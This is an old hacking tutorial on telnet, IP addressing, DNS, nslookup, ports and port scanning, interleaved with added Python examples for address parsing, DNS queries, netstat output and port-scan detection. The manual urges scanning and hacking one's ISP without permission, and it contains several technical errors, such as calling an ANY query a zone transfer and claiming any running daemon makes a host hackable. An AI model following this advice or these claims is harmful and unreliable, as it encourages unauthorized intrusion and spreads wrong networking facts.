The Hacking Truths Manual----Net Tools The 2nd Edition

By Ankit Fadia ankit@bol.net.in

Now that you know how to control the working of the Windows operating system, let's go on to the basics of using the Internet tools which are really, really useful for hacking.

Well, to tell you the truth, hacking would be much easier if you were running some sort of Unix on your machine or if you had a shell account. I am writing this guide keeping in mind the newbies who are probably stuck with Windows, and I am pretty sure that all those of you who are Linux geeks will have no problem figuring out how to do the same thing in Linux.

There is a common belief amongst people that Windoze is very insecure and that it sucks, but then on the other hand Red Hat too is not so great in the security sphere. There are nearly 50 known exploits to get root on a Linux box. The reason why hackers have found so many holes or bugs in Windows is that Windows is the most widely used OS in the world, so the largest number of hackers have access to Windows and the largest number of people have a go at Windoze's security.

The only things in support of Linux are the fact that it is free, the concept of Open Source and, well, performance. What I want to say is that Linux's performance may be better, but I do not agree with what all people say about Windoze's low security. So what I think is that there is nothing wrong in using a Windoze box for hacking. Yes, Linux does provide you access to some kewl hacking tools from the various shells, but for Windows there are many third party freebies that allow you to do the same thing. Linux does make hacking easier, but there is nothing wrong in using Windows for hacking. But for all those of you who think otherwise, you can, even if your ISP does not give you a shell account, use your Dial Up PPP account to log in to a third party shell account. To get a free shell account go to www.cyberarmy.com or www.hobbiton.org. Their service is pretty good.

Telnet

Telnet is the ultimate hacking tool which every hacker must know how to use before he can even think about hacking into servers. Telnet is better described as a protocol which requires or runs on TCP/IP.

It can be used to connect to remote computers and to run command line programs by simply typing commands into its GUI window. Telnet does not use the resources of the client's computer but uses the resources of the server to which the client has connected. Basically it is a terminal emulation program that allows us to connect to remote computers. It is found at

c:\windows\telnet.exe

in Win9x systems and

c:\winnt\system32\telnet.exe in NT machines.

If the Path statement on your machine is set correctly, then just typing telnet at the DOS prompt will bring up a GUI window, which is actually the Telnet program.

How do I connect to remote computers using telnet?

Well, it is really simple to connect to remote computers using telnet. First launch the telnet application by typing telnet at the DOS prompt. Once the Telnet window pops up, click on Connect > Remote System, then in the Host Name box type the host, i.e. the remote computer you want to connect to. Then in the Port box select the port you want to connect to; in this case leave it at Telnet. Almost always leave the TermType at vt100.

***********************

Hacking Tip: You may be wondering what the Term Type stands for. Well, actually it represents various kinds of display units. We use vt100 as it is compatible with most monitors.

**********************

Then click connect and you will be connected to the remote machine.

Now if you are a newbie you would be using the above method of telnetting to a remote computer and you would not be port surfing. Well, if you really want to learn to hack, port surfing is a must, as without learning to port surf you will not be able to find out.

The basic syntax of the telnet command is

C:\>telnet hostname.com port

Now let's go through this syntax: the word telnet is followed by the host name or the IP address of the host you want to connect to, which is then followed by the port on the remote computer you want to connect to. If you are confused by the new terms, read on and things will become clearer.

What exactly is an IP Address?

Just as in the real world everyone has an individual home address or telephone number so that that particular individual can be contacted at that number or address, similarly all computers connected to the Internet are given a unique Internet Protocol or IP address which can be used to contact that particular computer. In geek language, an IP address is a decimal notation that divides the 32 bit Internet address (IP) into four 8 bit fields.

Does the IP address give me some information or do the numbers stand for anything?

Let's take the example of the following IP address: 202.144.49.110

Now the first part, the number before the first decimal point, i.e. 202, is the Network Number or the Network Prefix. This means that it identifies the number of the network in which the host is.

The second part, i.e. 144, is the Host Number, that is, it identifies the number of the host within the network. This means that within the same network, the network number is the same. In order to provide flexibility in the size of the network, there are different classes of IP addresses:

Address Class            Dotted Decimal Notation Ranges
Class A ( /8 Prefixes)   1.xxx.xxx.xxx   through 126.xxx.xxx.xxx
Class B ( /16 Prefixes)  128.0.xxx.xxx   through 191.255.xxx.xxx
Class C ( /24 Prefixes)  192.0.0.xxx     through 223.255.255.xxx

The various classes will become clearer after reading the next few lines.

Each Class A network address contains an 8 bit Network Prefix followed by a 24 bit Host Number. They are considered to be primitive. They are referred to as "/8's" or just "8's" as they have an 8 bit Network Prefix.

In a Class B network address there is a 16 bit Network Prefix followed by a 16 bit Host Number. It is referred to as "16's".

A Class C network address contains a 24 bit Network Prefix and an 8 bit Host Number. It is referred to as "24's" and is commonly used by most ISPs.

Due to the growing size of the Internet, network administrators faced many problems. The Internet routing tables were beginning to grow, and administrators now had to request another network number from the Internet before a new network could be installed at their site.

This is where subnetting came in. Now if your ISP is a big one and provides you with dynamic IP addresses, then you will most probably see that whenever you log on to the net, your IP address will have the same first 24 bits and only the last 8 bits will keep changing. This is due to the fact that when subnetting comes in, the IP address structure becomes:

xxx.xxx.zzz.yyy

where the first 2 parts are the Network Prefix numbers, zzz is the Subnet Number and yyy is the Host Number. So you are always connected to the same subnet within the same network. As a result the first 3 parts will remain the same and only the last part, i.e. yyy, is variable.

You may be wondering what happened to 127, as after 126.xxx.xxx.xxx there is straightaway 128.0.xxx.xxx.

Well, 127.0.0.1 is reserved for the loopback function. This means that it refers to the localhost, so if you try to telnet to 127.0.0.1 the Telnet client will try to connect to your own computer.
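The following is an added example, not part of the manual: it takes a dotted-decimal address apart the way the class table above describes, deciding the class from the leading bits of the first octet, splitting the 32-bit value into network prefix and host number, and reporting the reserved 127 block separately. The sample addresses at the bottom are constructed; the first is the manual's own example.

```python
# Added example (not part of the manual): take a dotted-decimal IPv4 address
# apart the way the Class A/B/C table above describes. The 32-bit value is
# split into a network prefix and a host number according to the address
# class, which is decided by the leading bits of the first octet. The
# 127.0.0.0/8 loopback block is reported separately, as the text notes it is
# reserved. Sample addresses at the bottom are constructed for illustration.

from typing import Dict, Optional


def parse_ipv4(text: str) -> int:
    """Convert 'a.b.c.d' to its 32-bit integer; rejects malformed input."""
    fields = text.strip().split(".")
    if len(fields) != 4:
        raise ValueError(f"expected four dotted-decimal fields: {text!r}")
    value = 0
    for field in fields:
        if not field.isdigit() or not 0 <= int(field) <= 255:
            raise ValueError(f"octet out of range in {text!r}: {field!r}")
        value = (value << 8) | int(field)
    return value


def to_dotted(value: int) -> str:
    """Inverse of parse_ipv4: 32-bit integer back to 'a.b.c.d'."""
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def classify(text: str) -> Dict[str, Optional[object]]:
    """Return class, prefix length, network prefix and host number."""
    value = parse_ipv4(text)
    first = value >> 24
    if first == 127:
        cls, prefix_bits = "loopback", 8          # reserved, points at localhost
    elif first & 0x80 == 0:
        cls, prefix_bits = "A", 8                 # leading bit 0    -> /8
    elif first & 0xC0 == 0x80:
        cls, prefix_bits = "B", 16                # leading bits 10  -> /16
    elif first & 0xE0 == 0xC0:
        cls, prefix_bits = "C", 24                # leading bits 110 -> /24
    elif first & 0xF0 == 0xE0:
        cls, prefix_bits = "D (multicast)", None  # 224-239: no host split
    else:
        cls, prefix_bits = "E (reserved)", None   # 240-255

    network = host_number = None
    if prefix_bits is not None:
        mask = (0xFFFFFFFF << (32 - prefix_bits)) & 0xFFFFFFFF
        network = to_dotted(value & mask)
        host_number = value & ~mask & 0xFFFFFFFF
    return {
        "address": to_dotted(value),
        "class": cls,
        "prefix_bits": prefix_bits,
        "network": network,
        "host_number": host_number,
    }


if __name__ == "__main__":
    # Constructed samples: the manual's own example address plus one per class.
    for sample in ("202.144.49.110", "10.1.2.3", "172.16.5.9", "127.0.0.1", "224.0.0.1"):
        print(classify(sample))
```

Run against the manual's example 202.144.49.110, the table puts it in Class C, so the /24 prefix 202.144.49 is the network part and 110 is the host number; a Class B address such as 172.16.5.9 splits after 16 bits instead.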

IP addresses can be of two types: Dynamic and Static.

Now most of us connect to the Internet by dialing into our ISP through Dial Up Networking and using PPP (Point to Point Protocol). When you connect to your ISP's server you are assigned a unique IP number which is then used to transfer data to and from your computer. That becomes your address. Now the IP address that you are assigned changes every time you connect to your ISP, i.e. you are assigned a new, different IP every time you dial into your ISP; that is how it becomes Dynamic. This means that if you have obtained the IP address of a person once, then if he disconnects and reconnects you will have to get his IP address again. Other ISPs provide you with a permanent IP address as soon as you register with them. In that case your IP remains the same every time you connect to their server and is thus known as a permanent IP address.

*******************

Hacking Tip: You can find out if an IP address is Dynamic or Static by using the ultimate mapping tool on the net: nslookup. Give the following command: nslookup hostname, where hostname is substituted by an IP address. If the result is Non-Existent Host/Domain then the IP is a Dynamic one. If it returns a hostname which is human understandable then you can be pretty sure that the IP address is a Static one.

For more information on DNS lookup and nslookup read on.

******************

Now IP addresses are very difficult to remember; who can memorize the IP addresses of all the computers he wants to connect to or the sites he wants to visit? For example, I am sure you would find hotmail.com easier to remember than something like 203.43.54.12. Here comes in DNS or the Domain Name System. Read on for more info on DNS.

DNS

A DNS is basically a resource for converting friendly hostnames (like hotmail.com) which humans can easily understand into IP addresses, which machines need in order to communicate with the host, i.e. hotmail.com.

Now what basically happens is that when you type www.hotmail.com in the location bar of your browser, the browser needs to perform a lookup to find the machine readable IP address so that it can communicate with the host. This means that the browser cannot communicate with a host if it has the friendly hostname only.

Without the IP address, no communication can take place. So for the lookup, the browser contacts the DNS server normally set up by your ISP and through the resolver tries to look for the IP conversion of the hostname the user wants to contact.

A DNS server is basically a server running DNS software. The server that the browser first looks to for a translation is the Primary DNS server; if this primary server doesn't show any match then it contacts another DNS server somewhere on the Internet (this becomes the Secondary DNS server) and looks for a match. If a match is found in the secondary server then the Primary server updates its database so that it doesn't have to contact the Secondary server again for the same match.

Each DNS server stores the hosts it has recently looked up in its cache. Now if the server has recently looked up a particular hostname, then it does not search for it again but just provides the browser with that information from its cache. If the cache does not contain a particular entry, then the resolver looks for the desired entry by searching through the entire database.

New technologies are being introduced in the DNS sphere. Now take the case of amazon.com. It is a famous and large E-company with over a million users per day (my rough estimate). Such large organizations have multiple IP addresses for the same domain name. Today what happens is that the DNS server returns all the IP addresses and the browser chooses a random IP from them. But this new technology will allow the DNS server to return the IP of the server which has the least traffic, so as to enhance surfing. So you can see DNS does make sense.

You can see how time consuming the above process can be, and it can really slow down your surfing: a lot of time is wasted when the browser contacts the DNS server and performs a lookup. So how do you speed up this process? How do you eliminate the fact that the browser will contact the DNS server each time you want to visit a site? Well, the answer lies in the HOSTS file hidden in the c:\windows directory.

You can map a machine's IP to any hostname by editing the c:\windows\hosts file (it has no extension) on Win 9.x systems. On NT the hosts file is c:\WinNT\system32\drivers\etc\hosts

And on Linux it is /etc/hosts.

A hosts file looks something like the below:

###############################
# Copyright (c) 1998 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP stack for Windows98
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.xx.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

127.0.0.1       localhost
#####################################

For example, if you know that the IP address of, say, hotmail.com is 207.xxx.xxx.xxx, then if you add the following to the Hosts file the browser will not perform a lookup and will straightaway have the IP to communicate with the host. So add the line:

207.xxx.xxx.xxx www.hotmail.com

Now your browser will connect faster to Hotmail.com. This technique can increase your surfing speed tremendously. So now that you know what a DNS is, let's get on to the subject of DNS lookup and Reverse DNS lookup.
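As an added example (not code from the manual), here is a parser for the HOSTS file format shown above together with the lookup the resolver performs before it ever asks a DNS server. The file content is constructed; 203.0.113.10 is a documentation placeholder standing in for the 207.xxx.xxx.xxx the text leaves unspecified, and the invalid and duplicate entries are there to show how such lines are treated.

```python
# Added example (not part of the manual): a parser for the HOSTS file format
# shown above and a lookup that mimics the resolver's first step. IP first,
# then one or more hostnames, whitespace separated; '#' starts a comment, on
# its own line or after an entry. The sample file content is constructed; the
# 203.0.113.10 address is a documentation placeholder standing in for the
# "207.xxx.xxx.xxx" the text leaves unspecified.

import ipaddress
from typing import Dict, List, Optional, Tuple

SAMPLE_HOSTS = """\
# Constructed sample HOSTS file
# 102.54.xx.97     rhino.acme.com          # commented out: not an entry
127.0.0.1       localhost
203.0.113.10    www.hotmail.com hotmail.com   # placeholder, not Hotmail's real IP
300.1.1.1       broken.example                # invalid address: must be skipped
10.0.0.5        intranet                      # first match wins ...
10.0.0.6        intranet                      # ... so this one is ignored
"""


def parse_hosts(text: str) -> Tuple[Dict[str, str], List[str]]:
    """Return (hostname -> IP mapping, list of skipped lines with reasons)."""
    table: Dict[str, str] = {}
    skipped: List[str] = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()       # drop comments, inline or whole-line
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            skipped.append(f"line {lineno}: no hostname after address")
            continue
        try:
            ip = str(ipaddress.ip_address(fields[0]))
        except ValueError:
            skipped.append(f"line {lineno}: bad address {fields[0]!r}")
            continue
        for name in fields[1:]:
            table.setdefault(name.lower(), ip)    # keep the first entry for a name
    return table, skipped


def resolve_local(name: str, table: Dict[str, str]) -> Optional[str]:
    """What the resolver does before touching DNS: consult the hosts table.

    Returns the mapped IP, or None meaning 'fall through to a DNS lookup'.
    Names are matched case-insensitively and a trailing dot is ignored.
    """
    return table.get(name.rstrip(".").lower())


if __name__ == "__main__":
    hosts, problems = parse_hosts(SAMPLE_HOSTS)
    for host in ("localhost", "WWW.HOTMAIL.COM", "intranet", "example.org"):
        print(f"{host:20} -> {resolve_local(host, hosts)}")
    print("skipped:", problems)
```

A None result is the signal to go on to the DNS server; anything else short-circuits the lookup exactly as the text describes, which is also why an unexpected entry in this file deserves a second look when a machine starts reaching the wrong address for a familiar name.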

Now Linux, or any other form of Unix, comes with a very interesting utility known as nslookup. This can be used to gather some very valuable information about a host. For details as to how to use this tool to gather information, read the man pages. Windows users can download SamSpade from www.samspade.org to perform an nslookup.

Just as a DNS lookup converts the hostname into an IP address, a Reverse DNS lookup converts the IP address of a host into the hostname. Thus we can conclude that a DNS lookup returns machine readable IP addresses and a reverse DNS lookup returns the human friendly hostname.

****************************

INFO: The DNS software normally runs on Port 53 of a host. So the browser connects to port 53 to perform a DNS lookup.

***************************

NslookUp

So how can you use nslookup to gain some valuable information about a host? Well, the best way to learn about a particular Unix command is to read the man pages. They are the ultimate source on all Unix commands and their parameters.

Now the first thing to do is either get SamSpade from www.samspade.org or, if you are using a shell account or are running any form of Unix, locate where the nslookup command is hidden by issuing the following command: ' whereis nslookup '.

I am just giving you a general introduction to nslookup; to learn about all Resource Records or query types do read through the man pages. You can use nslookup in two modes, either in interactive mode or in non-interactive mode. First I will explain the interactive mode. If you type nslookup at the shell prompt then it launches, say, the nslookup utility or the nslookup command.

$>/usr/etc/nslookup
Default Server: hobbiton.org
Address: 12.12.12.12

Now when you type just nslookup, the machine will return the IP address and the name of the server which is running the nslookup command for you; in this case it would be my shell account provider. Now once you have launched nslookup you need to specify the query type, which is the type of Resource Record (RR), by typing:

set type=RR

where RR can be any of the following:

A : Address

MX : Mail Exchanger

PTR : Pointer

CNAME: Canonical Name

HINFO: Host Info.

ANY : In this case a zone transfer takes place and all information on the host is returned; as a result an additional burden is put on the host and hence it may cause the host to hang or restart.

NOTE: To get the full list of RR's, read the man pages.

Now once the RR or the type has been set, you need to type in the host name or the IP of the server you want to gather info on. This might not be that clear, so let me take you through an example.

Firstly, for this example I am using my Linux box and am not logged on to any shell account, so my IP would be 127.0.0.1, and I am doing an A type nslookup on the host hotmail.com

$>nslookup
Server: localhost
Address: 127.0.0.1

>set type=A
>hotmail.com
Server: localhost
Address: 127.0.0.1

Note: I have typed whatever is after > and the other lines are written by the computer.

This will return the address info of the host hotmail.com. Do try it out and see what you get. Now if we want to run nslookup in non-interactive mode, then we have to write the command in the following format:

$>nslookup Hostname

Now in all the above examples we did a normal DNS lookup on the host. We can also use nslookup to perform a reverse DNS lookup by mentioning the IP of the host instead of the hostname.

Eg.

$>nslookup IP address

Now that you have understood the whole concept of DNS, you know what happens when we issue the /dns command in IRC.

There is yet another Unix utility or command called DIG or Domain Information Groper which, like nslookup, gives info on the host. It too is a part of SamSpade.
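What nslookup actually puts on the wire when you do set type=A and type a hostname, or when you give it an IP for a reverse lookup, is shown in this added example (not code from the manual or from nslookup). It builds the DNS query message for a chosen resource record type, forms the in-addr.arpa name a PTR lookup asks for, and parses a reply including the name-compression pointers real servers use. The reply is constructed locally so it runs offline; the hostname and addresses are placeholders.

```python
# Added example (not part of the manual): what nslookup puts on the wire when
# you do "set type=A" and then type a hostname, or a reverse lookup of an IP.
# It builds a DNS query message for a chosen resource record type, forms the
# in-addr.arpa name a PTR (reverse) lookup asks for, and parses a reply,
# including the name-compression pointers real servers use. The reply used at
# the bottom is constructed locally so the code runs offline; nothing is sent.

import struct
from typing import Dict, List, Tuple

# Query type codes for the RRs listed in the text (values from RFC 1035).
QTYPES = {"A": 1, "NS": 2, "CNAME": 5, "PTR": 12, "HINFO": 13, "MX": 15, "ANY": 255}


def reverse_name(ip: str) -> str:
    """'202.144.49.110' -> '110.49.144.202.in-addr.arpa' (the PTR query name)."""
    octets = ip.split(".")
    if len(octets) != 4 or not all(o.isdigit() and int(o) < 256 for o in octets):
        raise ValueError(f"not a dotted-decimal IPv4 address: {ip!r}")
    return ".".join(reversed(octets)) + ".in-addr.arpa"


def encode_name(name: str) -> bytes:
    """Wire form of a name: length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        if not 0 < len(label) < 64:
            raise ValueError(f"bad label {label!r} in {name!r}")
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(name: str, qtype: str, txid: int = 0x1234) -> bytes:
    """Standard recursive query: 12-byte header + one question (class IN)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD flag set
    return header + encode_name(name) + struct.pack("!HH", QTYPES[qtype], 1)


def decode_name(msg: bytes, offset: int) -> Tuple[str, int]:
    """Read a possibly compressed name; returns (name, offset after it)."""
    labels: List[str] = []
    while True:
        length = msg[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if length & 0xC0 == 0xC0:                      # pointer to an earlier name
            pointer = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            tail, _ = decode_name(msg, pointer)
            labels.append(tail)
            return ".".join(labels), offset + 2
        offset += 1
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length


def parse_response(msg: bytes) -> Dict[str, object]:
    """Parse header, question and answer RRs (A, PTR, CNAME, NS, MX decoded)."""
    txid, flags, _, ancount, _, _ = struct.unpack("!HHHHHH", msg[:12])
    offset = 12
    qname, offset = decode_name(msg, offset)
    qtype, _ = struct.unpack("!HH", msg[offset:offset + 4])
    offset += 4
    answers = []
    for _ in range(ancount):
        rname, offset = decode_name(msg, offset)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        rdata = msg[offset:offset + rdlen]
        if rtype == 1:                                  # A: four raw bytes
            value = ".".join(str(b) for b in rdata)
        elif rtype in (2, 5, 12):                       # NS, CNAME, PTR: a name
            value, _ = decode_name(msg, offset)
        elif rtype == 15:                               # MX: preference + name
            value, _ = decode_name(msg, offset + 2)
            value = f"{struct.unpack('!H', rdata[:2])[0]} {value}"
        else:
            value = rdata.hex()
        answers.append((rname, rtype, ttl, value))
        offset += rdlen
    return {"id": txid, "rcode": flags & 0xF, "question": (qname, qtype), "answers": answers}


def build_a_response(query: bytes, addresses: List[str], ttl: int = 300) -> bytes:
    """Constructed reply for offline testing: echoes the question and adds one
    A record per address, naming it with a compression pointer (0xC00C) back
    to the question name at offset 12, exactly as real servers do."""
    header = query[:2] + struct.pack("!HHHHH", 0x8180, 1, len(addresses), 0, 0)
    answers = b""
    for addr in addresses:
        rdata = bytes(int(o) for o in addr.split("."))
        answers += b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, ttl, 4) + rdata
    return header + query[12:] + answers


if __name__ == "__main__":
    q = build_query("hotmail.com", "A")
    print(parse_response(build_a_response(q, ["203.0.113.5", "203.0.113.6"])))
    print(build_query(reverse_name("202.144.49.110"), "PTR").hex())
```

Sending the bytes from build_query to UDP port 53 of a resolver and feeding what comes back to parse_response is the whole of a lookup; a reverse lookup is the same exchange with the in-addr.arpa name and QTYPE 12, which is why nslookup can take an IP where it normally takes a hostname.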

Ports

Now that you know what an IP is and what DNS or the hostname is, let's move on to Ports.

There are basically two kinds of ports: Physical (Hardware) and Virtual (Software). You may know ports as the slots behind your CPU to which you connect your mouse, keyboard or monitor. Well, they are physical hardware ports. The ports we hackers are interested in are virtual software ports.

A port is a virtual pipe through which information goes in and out. A particular computer can have a large number of ports. All ports are numbered. Now at each port a particular service is running. A piece of software which runs on a port is called a service. So how do you know which service is running on which port? Well, all ports are numbered and there is a general rule which almost everyone follows that decides which service usually runs at which port.

Some popular ports and the services running on them are:

Ping     7
Systat   11
Time     13
NetStat  15
SSH      22    (This is the same as Secure Shell Login)
Telnet   23
SMTP     25
Whois    43
Finger   79
HTTP     80
POP      110
NNTP     119
rlogin   513   (IP Spoofing can be used here.)

To get an entire list of port numbers and the corresponding service running at that particular port, read RFC1700.

Ports under 1024 usually have popular well known services running on them. The higher port numbers are used, say, when your browser needs to connect to a remote server: when the browser connects to port 80 of the remote server and requests the default webpage, the browser chooses a random port above 1024 for its own end.

************

Newbie Note: What the hell is an RFC? Well, RFC stands for Request For Comment.

They are texts which cover each and every aspect of Networking and the Internet. They are written by geeks, and if you want to become an uberhacker then you will have to learn all RFCs by heart. All these new terms and the whole TCP/IP protocol may sound weird and difficult to grasp, but if you want to be a good hacker then you will have to stay with them the rest of your life. To locate an RFC just go to your fav search engine and type the RFC number.

*************

*************

NewBie Note:

What is a Daemon?

Well, a daemon is a program that runs in the background at many Unix ports.

If you find a service or a daemon running at a port, I am sure that computer is hackable.

*************

Port Scanning & Port Surfing

Now that you know everything about Telnet and have some basic networking knowledge, let's have some fun by learning to port surf. It is the first basic step in finding a hackable server running a daemon with a hole or a vulnerability.

Say you want to hack into your ISP's server, what do you do? You first find out the hostnames of the servers run by your ISP. Now each server can have a large number of open ports and it would take days to manually go to each port and then find out that no service is running at that port. So here come in the port scanning utilities, which give a list of open ports on a server. Some port scanners, along with the list of open ports, also give the services running on each port and their vulnerabilities, if any.

Now port scanning takes advantage of the 3-stage TCP handshake to determine what ports are open on the remote computer. To learn more about the TCP/IP protocol, read the networking manuals that I distribute on my mailing list.

Tools like SATAN, and lots more of them, allow you to find out the list of open ports, the daemon or the service running at each open port and also the service's vulnerability at the click of a button. You can't call yourself a hacker if you need some software, which first of all is not written by you, to do something as lame as a port scan. Well, yes, I do agree that looking for open ports on a server would take a long time. But what I am suggesting is that you use a port scanning tool which just gives you a list of open ports, without the list of services and the vulnerabilities. I assure you, if you try and explore an open port of a remote server manually, you will be able to learn more about the remote system and it will also give you a taste of what hacking actually is. If you use a port scanner which gives you all the details at the click of a button to impress your friends, let me assure you none of them will be impressed, as I am sure anyone can use SATAN and other such scanners.

Another thing you need to be careful about before port scanning your ISP is that most port scanners are very easily detected and can easily be traced, and you have no excuse if you are caught doing a port scan on a host; it is a sure sign of hacker activity. There are many stealth scanners like Nmap which claim to be untraceable. But the truth is that they are very much traceable, and they are quite inaccurate as they send only a single packet to check if a port is open or not. And if the host is running the right kind of sniffer software, maybe EtherPeek, then the port scan can be easily detected and the IP of the user logged. Anyway, some ISPs are really afraid of hacking activities and even at the slightest hint of some suspicious hacking activity, something like port scanning, they can remove your account. So just be careful.

************

Evil Hacking Trick: Well, try to keep an eye on TCP port 12345 and UDP port 31337; these are the default ports for the popular trojans NetBus and BO, respectively.

*************

Some ISPs are quite aware of hacking activities and are one step ahead. They may be running some excellent software which will keep hackers away. EtherPeek is an excellent example of sniffing software which can easily trace users who are port scanning. Nuke Nabber, a Windows freeware, claims to be able to block port scans. I have not tested it so I can't say for sure. Then there is another fun program known as Port Dumper which can fake daemons (services) like Telnet, Finger etc.
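The text says twice that a port scan is easy to spot from the other side. This added example (not from the manual, nor from EtherPeek or Nuke Nabber) shows the logic a sniffer or firewall log monitor applies to do that: it reads connection-attempt log lines and flags any source that touches an unusual number of distinct destination ports within a short window. The log format and every address in it are constructed; the code scans nothing.

```python
# Added example (not part of the manual): the detection side of the point made
# above, that a port scan is easy to spot. Given connection-attempt log lines
# (the format and every address below are constructed for this example), it
# flags any source that touches an unusual number of distinct destination
# ports within a short window, which is the footprint a scan leaves. This is
# the logic a sniffer or firewall log monitor applies; it does no scanning.

import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed log: one source walks a dozen ports in a few seconds (a scan),
# while another opens two ordinary connections (mail and web).
SAMPLE_LOG = """\
1999-08-01 10:00:01 src=203.0.113.7 dst=198.51.100.2 dport=21 proto=TCP flags=S
1999-08-01 10:00:01 src=203.0.113.7 dst=198.51.100.2 dport=22 proto=TCP flags=S
1999-08-01 10:00:01 src=203.0.113.7 dst=198.51.100.2 dport=23 proto=TCP flags=S
1999-08-01 10:00:02 src=203.0.113.7 dst=198.51.100.2 dport=25 proto=TCP flags=S
1999-08-01 10:00:02 src=203.0.113.50 dst=198.51.100.2 dport=110 proto=TCP flags=S
1999-08-01 10:00:02 src=203.0.113.7 dst=198.51.100.2 dport=79 proto=TCP flags=S
1999-08-01 10:00:02 src=203.0.113.7 dst=198.51.100.2 dport=80 proto=TCP flags=S
1999-08-01 10:00:03 src=203.0.113.7 dst=198.51.100.2 dport=110 proto=TCP flags=S
1999-08-01 10:00:03 src=203.0.113.7 dst=198.51.100.2 dport=119 proto=TCP flags=S
1999-08-01 10:00:03 src=203.0.113.7 dst=198.51.100.2 dport=139 proto=TCP flags=S
1999-08-01 10:00:04 src=203.0.113.7 dst=198.51.100.2 dport=143 proto=TCP flags=S
1999-08-01 10:00:04 src=203.0.113.7 dst=198.51.100.2 dport=443 proto=TCP flags=S
1999-08-01 10:00:05 src=203.0.113.7 dst=198.51.100.2 dport=513 proto=TCP flags=S
1999-08-01 10:00:09 src=203.0.113.50 dst=198.51.100.2 dport=80 proto=TCP flags=S
this line is garbage and must be ignored
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
    r"src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+)"
)


def parse_log(text: str) -> Dict[str, List[Tuple[datetime, int]]]:
    """Group (timestamp, destination port) events by source address."""
    events: Dict[str, List[Tuple[datetime, int]]] = defaultdict(list)
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                                     # tolerate unparseable lines
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        events[m["src"]].append((ts, int(m["dport"])))
    for src in events:
        events[src].sort()
    return events


def detect_port_scans(text: str, threshold: int = 10, window_seconds: int = 60) -> Dict[str, int]:
    """Return {source: distinct ports} for sources hitting >= threshold distinct
    ports inside any window of window_seconds. Sliding window over sorted events."""
    flagged: Dict[str, int] = {}
    for src, evs in parse_log(text).items():
        best = 0
        for i in range(len(evs)):
            ports = set()
            for ts, port in evs[i:]:
                if (ts - evs[i][0]).total_seconds() > window_seconds:
                    break
                ports.add(port)
            best = max(best, len(ports))
        if best >= threshold:
            flagged[src] = best
    return flagged


if __name__ == "__main__":
    print(detect_port_scans(SAMPLE_LOG))   # the scanner is flagged, the mail/web user is not
```

The threshold and window are the tuning knobs: a user opening mail and web connections touches two or three ports over minutes, while a scanner touches dozens in seconds, and a rule that keys on distinct ports per source per window separates the two without any knowledge of which scanner was used.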

How can I find out my own IP address and what ports are open on my machine?

All this talk about IPs and ports may have made you quite interested in this subject, and you may be dying to find out a method of finding the open ports on your machine and your own IP address.

Well, just type the following at the DOS prompt (Windows users) or the bash prompt (Unix users): netstat -a

This will return something like the following:

C:\WINDOWS>netstat -a

Active Connections

  Proto  Local Address              Foreign Address          State
  TCP    ankit-s-hax-box:1030       0.0.0.0:0                LISTENING
  TCP    ankit-s-hax-box:1033       0.0.0.0:0                LISTENING
  TCP    ankit-s-hax-box:1027       0.0.0.0:0                LISTENING
  TCP    ankit-s-hax-box:1030       mail2.mtnl.net.in:pop3   ESTABLISHED
  TCP    ankit-s-hax-box:1033       zztop.boxnetwork.net:80  CLOSE_WAIT
  TCP    ankit-s-hax-box:137        0.0.0.0:0                LISTENING
  TCP    ankit-s-hax-box:138        0.0.0.0:0                LISTENING
  TCP    ankit-s-hax-box:nbsession  0.0.0.0:0                LISTENING
  UDP    ankit-s-hax-box:1027       *:*
  UDP    ankit-s-hax-box:nbname     *:*
  UDP    ankit-s-hax-box:nbdatagram *:*
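Reading that listing by hand is fine for a dozen lines; this added example (not from the manual) parses netstat -a output and answers the two questions the section asks, what is listening on this machine and what is it connected to, and adds the check a defender would want given the trojan default ports mentioned earlier (TCP 12345 for NetBus, UDP 31337 for BO). The sample is the listing above plus one constructed extra line to exercise that check; the service-name table is assembled from the port list in this manual and the names netstat itself prints.

```python
# Added example (not part of the manual): a parser for the "netstat -a" output
# shown above, answering the two questions the section asks, what is listening
# on my machine and what am I connected to, and adding the check a defender
# would want: are the trojan default ports the text mentions (TCP 12345 for
# NetBus, UDP 31337 for BO) open? The sample is the manual's own listing plus
# one constructed extra line to exercise that check; the service-name table is
# assembled from the port list and the names netstat prints in the listing.

from typing import Dict, List, Tuple

SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    ankit-s-hax-box:1030   0.0.0.0:0              LISTENING
  TCP    ankit-s-hax-box:1033   0.0.0.0:0              LISTENING
  TCP    ankit-s-hax-box:1027   0.0.0.0:0              LISTENING
  TCP    ankit-s-hax-box:1030   mail2.mtnl.net.in:pop3 ESTABLISHED
  TCP    ankit-s-hax-box:1033   zztop.boxnetwork.net:80 CLOSE_WAIT
  TCP    ankit-s-hax-box:137    0.0.0.0:0              LISTENING
  TCP    ankit-s-hax-box:138    0.0.0.0:0              LISTENING
  TCP    ankit-s-hax-box:nbsession  0.0.0.0:0          LISTENING
  UDP    ankit-s-hax-box:1027   *:*
  UDP    ankit-s-hax-box:nbname *:*
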